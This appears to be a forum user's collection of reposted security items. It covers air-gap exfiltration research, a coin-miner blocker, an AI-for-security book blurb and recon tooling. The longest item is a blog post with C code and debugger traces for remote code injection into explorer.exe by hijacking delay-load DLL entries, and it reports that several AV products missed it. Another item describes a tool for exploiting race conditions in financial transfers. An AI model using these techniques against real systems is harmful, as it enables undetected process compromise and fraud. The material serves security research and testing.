Everything posted by Nytro

  1. Air-Gap Research Page

     By Dr. Mordechai Guri, Cyber-Security Research Center, Ben-Gurion University of the Negev, Israel. Email: gurim@post.bgu.ac.il (LinkedIn)

     aIR-Jumper (Optical)
     Mordechai Guri, Dima Bykhovsky, Yuval Elovici. "aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)."
     Paper: http://arxiv.org/abs/1709.05742
     Video (infiltration): https://www.youtube.com/watch?v=auoYKSzdOj4
     Video (exfiltration): https://www.youtube.com/watch?v=om5fNqKjj2M

     xLED (Optical)
     Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici. "xLED: Covert Data Exfiltration from Air-Gapped Networks via Router LEDs."
     Paper: https://arxiv.org/abs/1706.01140 or http://cyber.bgu.ac.il/advanced-cyber/system/files/xLED-Router-Guri_0.pdf
     Demo video: https://www.youtube.com/watch?v=mSNt4h7EDKo

     AirHopper (Electromagnetic)
     Mordechai Guri, Gabi Kedma, Assaf Kachlon, and Yuval Elovici. "AirHopper: Bridging the air-gap between isolated networks and mobile phones using radio frequencies." In Malicious and Unwanted Software: The Americas (MALWARE), 2014 9th International Conference on, pp. 58-67. IEEE, 2014.
     Mordechai Guri, Matan Monitz, and Yuval Elovici. "Bridging the Air Gap between Isolated Networks and Mobile Phones in a Practical Cyber-Attack." ACM Transactions on Intelligent Systems and Technology (TIST) 8, no. 4 (2017): 50.
     Demo video: https://www.youtube.com/watch?v=2OzTWiGl1rM&t=20s

     BitWhisper (Thermal)
     Mordechai Guri, Matan Monitz, Yisroel Mirski, and Yuval Elovici. "BitWhisper: Covert signaling channel between air-gapped computers using thermal manipulations." In Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 276-289. IEEE, 2015.
     Demo video: https://www.youtube.com/watch?v=EWRk51oB-1Y&t=15s

     GSMem (Electromagnetic)
     Mordechai Guri, Assaf Kachlon, Ofer Hasson, Gabi Kedma, Yisroel Mirsky, and Yuval Elovici. "GSMem: Data exfiltration from air-gapped computers over GSM frequencies." In 24th USENIX Security Symposium (USENIX Security 15), pp. 849-864. 2015.
     Demo video: https://www.youtube.com/watch?v=RChj7Mg3rC4

     Fansmitter (Acoustic)
     Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "Fansmitter: Acoustic Data Exfiltration from (Speakerless) Air-Gapped Computers." arXiv preprint arXiv:1606.05915 (2016).
     Demo video: https://www.youtube.com/watch?v=v2_sZIfZkDQ

     DiskFiltration (Acoustic)
     Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, Yuval Elovici. "Acoustic Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard-Drive Noise ('DiskFiltration')." European Symposium on Research in Computer Security (ESORICS 2017), pp. 98-115.
     Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise." arXiv preprint arXiv:1608.03431 (2016).
     Demo video: https://www.youtube.com/watch?v=H7lQXmSLiP8

     USBee (Electromagnetic)
     Mordechai Guri, Matan Monitz, and Yuval Elovici. "USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB." arXiv preprint arXiv:1608.08397 (2016).
     Demo video: https://www.youtube.com/watch?v=E28V1t-k8Hk

     LED-it-GO (Optical)
     Mordechai Guri, Boris Zadov, Yuval Elovici. "LED-it-GO: Leaking (A Lot of) Data from Air-Gapped Computers via the (Small) Hard Drive LED." Detection of Intrusions and Malware, and Vulnerability Assessment - 14th International Conference, DIMVA 2017: 161-184.
     Mordechai Guri, Boris Zadov, Eran Atias, and Yuval Elovici. "LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED." arXiv preprint arXiv:1702.06715 (2017).
     Demo video: https://www.youtube.com/watch?v=4vIu8ld68fc

     VisiSploit (Optical)
     Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "An optical covert-channel to leak data through an air-gap." In Privacy, Security and Trust (PST), 2016 14th Annual Conference on, pp. 642-649. IEEE, 2016.
     Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "VisiSploit: An Optical Covert-Channel to Leak Data through an Air-Gap." arXiv preprint arXiv:1607.03946 (2016).

     Attachment: xLED-Router-Guri.pdf
     Link: http://cyber.bgu.ac.il/advanced-cyber/airgap
  2. The information security world is rich with information. From reviewing logs to analyzing malware, information is everywhere and in vast quantities, more than the workforce can cover. Artificial intelligence is a field of study that is adept at applying intelligence to vast amounts of data and deriving meaningful results. In this book, we will cover machine learning techniques in practical situations to improve your ability to thrive in a data-driven world. With clustering, we will explore grouping items and identifying anomalies. With classification, we'll cover how to train a model to distinguish between classes of inputs. In probability, we'll answer the question "What are the odds?" and make use of the results. With deep learning, we'll dive into the powerful biology-inspired realms of AI that power some of the most effective methods in machine learning today.

     The Cylance Data Science team consists of experts in a variety of fields. Contributing members from this team for this book include Brian Wallace, a security researcher turned data scientist with a propensity for building tools that merge the worlds of information security and data science. Sepehr Akhavan-Masouleh is a data scientist who works on the application of statistical and machine learning models in cyber-security, with a Ph.D. from the University of California, Irvine. Andrew Davis is a neural network wizard wielding a Ph.D. in computer engineering from the University of Tennessee. Mike Wojnowicz is a data scientist with a Ph.D. from Cornell University who enjoys developing and deploying large-scale probabilistic models due to their interpretability. Data scientist John H. Brock researches applications of machine learning to static malware detection and analysis, holds an M.S. in computer science from the University of California, Irvine, and can usually be found debugging Lovecraftian open source code while mumbling to himself about the virtues of unit testing.
Download: http://defense.ballastsecurity.net/static/IntroductionToArtificialIntelligenceForSecurityProfessionals_Cylance.pdf
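The clustering and anomaly-detection topics the blurb mentions can be made concrete with a tiny example. The following is an illustrative stdlib sketch (not code from the book) of z-score anomaly detection, one of the simplest ways to flag outliers in security telemetry such as failed-login counts:

```python
from statistics import mean, stdev

def zscore_anomalies(values, threshold=3.0):
    """Flag values whose z-score (distance from the mean in
    standard deviations) exceeds the threshold."""
    mu = mean(values)
    sigma = stdev(values)
    return [v for v in values if abs(v - mu) / sigma > threshold]

# Hypothetical failed-login counts per hour; the spike stands out.
logins = [3, 5, 4, 6, 2, 5, 4, 3, 250]
print(zscore_anomalies(logins, threshold=2.0))  # [250]
```

Real pipelines would use more robust statistics (a single huge outlier inflates the standard deviation), but the check-against-a-baseline idea is the same.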
  3. No Coin

     No Coin is a tiny browser extension aiming to block coin miners such as Coinhive.

     You can grab the extension from:
       • Chrome Web Store
       • Firefox Add-on (coming soon)

     Why? Even though I think using coin mining in the browser to monetize content is a great idea, abusing it is not. Some websites run it during the entire browsing session, which results in high consumption of your computer's resources. I do believe that using it occasionally, such as for the proof of work of a captcha, is OK. But for an entire browsing session, the user should have the choice to opt in, which is the aim of this extension.

     Why not just block the URLs in an adblocker? The idea was to keep it separate from adblocking. Coin mining in the browser is a different issue: where ads track you and visually interfere with your browsing experience, coin mining, if abused, eats your computer's resources, resulting in slowdowns (from high CPU usage) and excessive power consumption. You might be OK with that and not with ads, or vice versa. Or you might just want to keep ads blocked entirely and enable the coin mining script for a minute to pass a captcha. That's why I believe having a separate extension is useful.

     How does it work? The extension simply blocks a list of blacklisted domains in blacklist.txt. Clicking on the icon will display a button to pause/unpause No Coin. If you are aware of any scripts or services that provide coin mining in the browser, please submit a PR.

     Contribute: Contributions are welcome! Don't hesitate to submit bug fixes, improvements, and new features. Regarding new features, please have a look at the issues first. If a feature you wish to work on is not listed there, you might want to add an issue first before starting to work on a PR.

     Made by Rafael Keramidas (keraf [at] protonmail [dot] com - @iamkeraf - ker.af). Image used for logo by Sandro Pereira.

     Source: https://github.com/keraf/NoCoin
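The domain-blacklist matching that blacklist.txt drives can be sketched in a few lines. This is an illustrative Python model of the matching logic only, not the extension's actual JavaScript, and the listed domains are examples:

```python
def is_blocked(hostname, blacklist):
    """True if hostname equals a blacklisted domain or is a subdomain of one."""
    hostname = hostname.lower().rstrip(".")
    return any(hostname == d or hostname.endswith("." + d) for d in blacklist)

# Illustrative entries; the real list lives in blacklist.txt.
blacklist = ["coinhive.com", "coin-hive.com"]
print(is_blocked("coinhive.com", blacklist))       # True
print(is_blocked("cdn.coin-hive.com", blacklist))  # True
print(is_blocked("example.com", blacklist))        # False
```

The suffix check with a leading dot matters: it blocks subdomains of a listed domain without accidentally matching lookalikes such as notcoinhive.com.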
  4. Are there really people who read the "Terms and conditions"? Or the "Privacy policy"?
  5. Abusing Delay Load DLLs for Remote Code Injection

     Sep 19th, 2017

     I always tell myself that I'll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motivation to conduct more public research. I do love it.

     This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit; it's simply another strategy for migrating into other processes.

     Modern code injection techniques typically rely on a variation of two different Win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article [0] detailing ten various methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we're not touching the IAT and we don't require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I'll detail below.

     Delay Load DLLs

     Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that's fixed up on first call. This process is illustrated well by a decades-old figure from a great Microsoft article released in 1998 [1] that describes the strategy; I'll attempt to distill it here.
     Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK:

         struct InternalImgDelayDescr
         {
             DWORD           grAttrs;     // attributes
             LPCSTR          szName;      // pointer to dll name
             HMODULE *       phmod;       // address of module handle
             PImgThunkData   pIAT;        // address of the IAT
             PCImgThunkData  pINT;        // address of the INT
             PCImgThunkData  pBoundIAT;   // address of the optional bound IAT
             PCImgThunkData  pUnloadIAT;  // address of optional copy of original IAT
             DWORD           dwTimeStamp; // 0 if not bound,
                                          // otherwise date/time stamp of DLL bound to (Old BIND)
         };

     The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header:

         0:022> lm m explorer
         start    end        module name
         00690000 00969000   explorer   (pdb symbols)
         0:022> !dh 00690000 -f

         File Type: EXECUTABLE IMAGE
         FILE HEADER VALUES
         [...]
            68A80 [      40] address [size] of Load Configuration Directory
                0 [       0] address [size] of Bound Import Directory
             1000 [     D98] address [size] of Import Address Table Directory
            AC670 [     140] address [size] of Delay Import Directory
                0 [       0] address [size] of COR20 Header Directory
                0 [       0] address [size] of Reserved Directory

     The first entry and its delay-linked DLL can be seen in the following:

         0:022> dd 00690000+ac670 l8
         0073c670  00000001 000ac7b0 000b24d8 000b1000
         0073c680  000ac8cc 00000000 00000000 00000000
         0:022> da 00690000+000ac7b0
         0073c7b0  "WINMM.dll"

     This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the pseudo IAT by using GetProcAddress to locate the desired function and patching the table at runtime.
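To make the raw dd dump above easier to read, here is a small Python sketch (not from the original post) that unpacks the eight little-endian DWORDs of a 32-bit delay import descriptor. Field names follow the SDK's IMAGE_DELAYLOAD_DESCRIPTOR, and the byte values are copied from the explorer/WINMM dump:

```python
import struct

# Field order of a 32-bit IMAGE_DELAYLOAD_DESCRIPTOR (all values are RVAs).
FIELDS = ("Attributes", "DllNameRVA", "ModuleHandleRVA",
          "ImportAddressTableRVA", "ImportNameTableRVA",
          "BoundImportAddressTableRVA", "UnloadInformationTableRVA",
          "TimeDateStamp")

def parse_delay_descriptor(raw):
    """Unpack one 32-byte descriptor into a name -> value dict."""
    return dict(zip(FIELDS, struct.unpack("<8I", raw)))

# The eight DWORDs dumped from explorer.exe's first delay entry (WINMM).
raw = struct.pack("<8I", 0x00000001, 0x000AC7B0, 0x000B24D8, 0x000B1000,
                  0x000AC8CC, 0, 0, 0)
desc = parse_delay_descriptor(raw)
print(hex(desc["DllNameRVA"]))             # 0xac7b0 -> "WINMM.dll"
print(hex(desc["ImportAddressTableRVA"]))  # 0xb1000, the pseudo IAT
```

Decoded this way, the dump lines up directly with the debugger session: DllNameRVA points at the "WINMM.dll" string and ImportAddressTableRVA at the pseudo IAT discussed next.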
     The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So, for example, in WINMM.dll's case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth.

     Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping its pseudo IAT entry:

         0:022> dps 00690000+000b1000 l2
         00741000  006dd0ac explorer!_imp_load__PlaySoundW
         00741004  00000000

     Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here:

         0:022> u explorer!_imp_load__PlaySoundW
         explorer!_imp_load__PlaySoundW:
         006dd0ac b800107400      mov     eax,offset explorer!_imp__PlaySoundW (00741000)
         006dd0b1 eb00            jmp     explorer!_tailMerge_WINMM_dll (006dd0b3)
         explorer!_tailMerge_WINMM_dll:
         006dd0b3 51              push    ecx
         006dd0b4 52              push    edx
         006dd0b5 50              push    eax
         006dd0b6 6870c67300      push    offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
         006dd0bb e8296cfdff      call    explorer!__delayLoadHelper2 (006b3ce9)

     The tailMerge function is a linker-generated stub that's compiled in per DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib.
     Here's the process of resolution of DnsAcquireContextHandle:

         0:000> dps 00060000+0001839c l2
         0007839c  000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
         000783a0  00000000
         0:000> bp DelayTest!__delayLoadHelper2
         0:000> g
         ModLoad: 753e0000 7542c000   C:\Windows\system32\apphelp.dll
         Breakpoint 0 hit
         [...]
         0:000> dd esp+4 l1
         0024f9f4  00075ffc
         0:000> dd 00075ffc l4
         00075ffc  00000001 00010fb0 000183c8 0001839c
         0:000> da 00060000+00010fb0
         00070fb0  "DNSAPI.dll"
         0:000> pt
         0:000> dps 00060000+0001839c l2
         0007839c  74dfd0fc DNSAPI!DnsAcquireContextHandle_W
         000783a0  00000000

     Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the pseudo IAT both executable and writable:

         0:011> !vprot 00060000+0001839c
         BaseAddress:       00371000
         AllocationBase:    00060000
         AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY

     At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state:

         00741044  00726afa explorer!_imp_load__UnInitProcessPriv
         00741048  7467f845 DUI70!InitThread
         0074104c  00726b0f explorer!_imp_load__UnInitThread
         00741050  74670728 DUI70!InitProcessPriv
         0:022> lm m DUI70
         start    end        module name
         74630000 746e2000   DUI70      (pdb symbols)

     In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn't loaded, it will be null.
     So when a delayed function is invoked that's already loaded, the delay helper function will check its entry to determine if a handle to it can be used:

         HMODULE hmod = *idd.phmod;
         if (hmod == 0) {
             if (__pfnDliNotifyHook2) {
                 hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
             }
             if (hmod == 0) {
                 hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
             }
         }

     The idd structure is just an instance of the InternalImgDelayDescr described above, passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from the delay entry, then it uses that handle instead. It does NOT attempt to LoadLibrary regardless of this value; this can be used to our advantage.

     Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample.

     Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you'd expect, so we won't be touching on it here.

     Limitations

     Before detailing how we might abuse this (though it should be fairly obvious), it's important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so. The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well-supported function of the portable executable, and exists today on modern systems. Another limitation is that, because at its core it relies on LoadLibrary, there must exist a DLL on disk.
     There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, none of which actually use LoadLibrary...). In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you're using the suspended process/new process strategy, but may not be trivial on running applications.

     Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy [2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to employ this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share.

     Abuse

     When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process, an interesting case with several caveats that we'll explore below. I won't detail suspended processes, as it's essentially the same as a running process, but easier.
     It's easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3].

     Local Process

     The local process is the simplest and arguably the most useless case for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though. The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio. With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function:

         IMAGE_DELAYLOAD_DESCRIPTOR* findDelayEntry(char *cDllName)
         {
             PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
             PIMAGE_NT_HEADERS pImgNt  = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
             PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos +
                 pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
             DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
             IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;

             // iterate over entries
             for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++) {
                 char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
                 if (strcmp(_cDllName, cDllName) == 0) {
                     pImgResult = entry;
                     break;
                 }
             }

             return pImgResult;
         }

     It should be pretty clear what we're doing here.
     Once we've got the correct table entry, we need to mark the entry's DllName as writable, overwrite it with our custom DLL name, and restore the protection mask:

         IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll");
         DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
         VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
         WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
         VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);

     Now all that's left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary.

     Remote Process

     The most interesting of cases is the running remote process. For demonstration here, we'll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user. With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference [3]. We simply grab the remote PEB, parse the image and its directories, and locate the appropriate delay entry we're targeting.

     This part is likely to prove the most unfriendly when attempting to port this to another process: what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it's delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station [4].
     We can therefore assume that it's likely to be available and not fixed up on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected. When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer. The code for this is pretty simple:

         HRESULT hResult = S_FALSE;
         IShellDispatch *pIShellDispatch = NULL;

         CoInitialize(NULL);
         hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER,
                                    IID_IShellDispatch, (void**)&pIShellDispatch);
         if (SUCCEEDED(hResult)) {
             pIShellDispatch->EjectPC();
             pIShellDispatch->Release();
         }
         CoUninitialize();

     Our DLL only needs to export CM_Request_Eject_PC for us not to crash the process; we can either pass the request on to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection.

     Remote Process – All Fixed

     One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost. Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks to determine if it should reload the module or not: if it's null, it attempts to load it; if it's not, it uses that handle. We can abuse this check by nulling out the module handle, thereby "tricking" the helper function into once again loading that descriptor's DLL. In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully, the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again.
     In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name.

     Conclusions

     I should mention that I tested this strategy across several next-gen AV/HIPS appliances, which will go unnamed here, and none were able to detect the cross-process injection strategy. It would seem overall to be an interesting challenge for detection; in remote processes, the strategy uses the following chain of calls:

         OpenProcess(..);
         ReadRemoteProcess(..); // read image
         ReadRemoteProcess(..); // read delay table
         ReadRemoteProcess(..); // read delay entry 1...n
         VirtualProtectEx(..);
         WriteRemoteProcess(..);

     That's it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies.

     The referenced project [3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn't production quality; beware, here be dragons.

     Special thanks to Stephen Breen for reviewing this post.

     References
     [0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
     [1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx
     [2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx
     [3] https://github.com/hatRiot/DelayLoadInject
     [4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

     Posted by Bryan Alexander, Sep 19th, 2017
     Source: http://hatriot.github.io/blog/2017/09/19/abusing-delay-load-dll/
  6. Sakurity Racer

     This 128-LOC extension works pretty much as a "Make Money" button if used properly.

     LEGAL: Use at your own risk and only with your own projects. Do not use it against anyone else.

     Load this unpacked extension into your Chrome. We didn't upload it to the Chrome Store because for best results you need to run your own racer.js server anyway. See the circle on the right? It's the sniffer button. Once you click it, for the next 3 seconds all requests (except ignored ones like OPTIONS) will be blocked and sent to the specified default_server location where racer.js is running. Racer.js will get the exact same request you were about to make, along with all credentials and cookies, and will repeat it to the victim in parallel (5 times by default). That can trigger a race condition. No luck? Try it a few times, because most race conditions are hard to reproduce.

     For basic tests you can run racer.js on your localhost, and that will be used by default. For a real pentest, run it on a server as close to the victim as possible and change default_server inside sniffer.js.

     The best functionality to pentest: financial transfers, vouchers, discount codes, trade/withdraw functions, and other actions that you're supposed to perform a limited number of times. It doesn't cover all scenarios, such as timed race conditions or when you need to run a few different requests to achieve the result.

     Source: https://github.com/sakurity/racer
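To see why repeating one request in parallel pays off, consider this Python sketch (an analogy, not racer.js) of the check-then-act window behind a single-use voucher. A barrier stands in for several requests arriving at the server at effectively the same instant, so every worker passes the "is it used?" check before any of them marks the voucher used:

```python
import threading

class Voucher:
    """A single-use voucher guarded only by a naive check-then-act sequence."""
    def __init__(self):
        self.used = False
        self.redemptions = 0
        self.count_lock = threading.Lock()  # bookkeeping only, not a fix

def redeem(voucher, barrier):
    if not voucher.used:              # check: voucher looks unused
        barrier.wait()                # all racers pass the check together
        with voucher.count_lock:
            voucher.redemptions += 1  # act: value is granted again
        voucher.used = True           # marked used too late

voucher = Voucher()
barrier = threading.Barrier(5)
threads = [threading.Thread(target=redeem, args=(voucher, barrier))
           for _ in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(voucher.redemptions)  # 5: one voucher redeemed five times
```

A real server closes this window by making the check and the state change one atomic operation (a transaction or a unique constraint); the tool's job is simply to land enough simultaneous requests inside the window before that happens.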
  7. Kubebot: A Kubernetes Based Security Testing Slackbot

     Posted by @pentestit

     About a week ago, I blogged about the List of Portable Hardware Devices for Penetration Testing. The tool that I am blogging about today, Kubebot, is an awesome example and can be installed very easily on a Raspberry Pi that you have lying around. The best part is that it is open source and can be customized to do anything you want.

     What is Kubebot? Kubebot is an open source security testing Slackbot written in the Go programming language, with a Kubernetes backend on the Google Cloud Platform. All of us know that Kubernetes is an open-source system for automating deployment, scaling, and management of dockerized applications. We also know that running tasks such as reconnaissance on a target network is almost always time-consuming and cumbersome. With a tool like Kubebot to help, you can concentrate on other important work while it does its stuff. It dockerizes a lot of useful tools that help you perform reconnaissance on a target.

     List of tools included with Kubebot:
       • Enumall: a custom implementation of the Enumall script by the author. It helps you identify subdomains using several techniques that rely on services such as ThreatCrowd, Bing, Shodan, HackerTarget, and the famous Recon-NG.
       • git-all-secrets: an open source tool by the author @anshuman_bh to capture all Git secrets by leveraging multiple open source Git searching tools.
       • Gitrob: an open source, command line tool which can help organizations and security professionals find sensitive information lingering in publicly available files on GitHub.
       • git-secrets: an open source tool that scans commits and commit messages and alerts you to sensitive data that has been found.
       • Gobuster: a tool used to brute-force URIs (directories and files) on web sites and DNS subdomains (with wildcard support).
       • Nmap: all of us already know that Nmap, aka Network Mapper, is a free and open source utility for network discovery and security auditing.
       • SubBrute: a DNS meta-query spider that enumerates DNS records and subdomains.
       • Sublist3r: an open source Python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting by enumerating subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, VirusTotal, ThreatCrowd, DNSdumpster, and ReverseDNS. SubBrute was integrated with Sublist3r to increase the possibility of finding more subdomains using brute force with an improved wordlist.
       • truffleHog: an open source tool that searches through Git repositories for high-entropy strings, digging deep into commit history and branches. This is effective at finding secrets accidentally committed that contain high entropy.
       • Wfuzz: a tool designed to brute-force web applications. As of now, only basic authentication brute forcing has been implemented in Kubebot.

     Support for tools such as Metasploit is being worked on. Installing the tool, though lengthy, is quite easy.

     Download Kubebot: Installation instructions along with its prerequisites can be found here. You can check out the Kubebot Git repository from here.

     Source: http://pentestit.com/kubebot-kubernetes-based-security-testing-slackbot/
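The subdomain brute-forcers in the list above (Gobuster, SubBrute, Sublist3r) all start from the same simple step: expanding a wordlist into candidate names to resolve. A minimal Python illustration of that step (the domain and wordlist are examples, and this is not code from any of those tools):

```python
def candidates(domain, wordlist):
    """Expand a wordlist into fully qualified subdomain candidates."""
    return [f"{word}.{domain}" for word in wordlist]

# Real tools then resolve each candidate via DNS and keep the names that
# answer; production wordlists typically run to thousands of entries.
words = ["www", "mail", "vpn", "dev"]
print(candidates("example.com", words))
```

Everything else those tools add (search-engine scraping, wildcard detection, parallel resolvers) is refinement around this candidate-generation core.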
  8. Cure53 Browser Security White Paper Welcome to the code repository for the Cure53 Browser Security White Paper! This is the right place to leave comments and file bugs in case we got something wrong. The latest version of the PDF will be available here as well. Expect frequent updates for smaller fixes and adjustments. Sursa: https://github.com/cure53/browser-sec-whitepaper
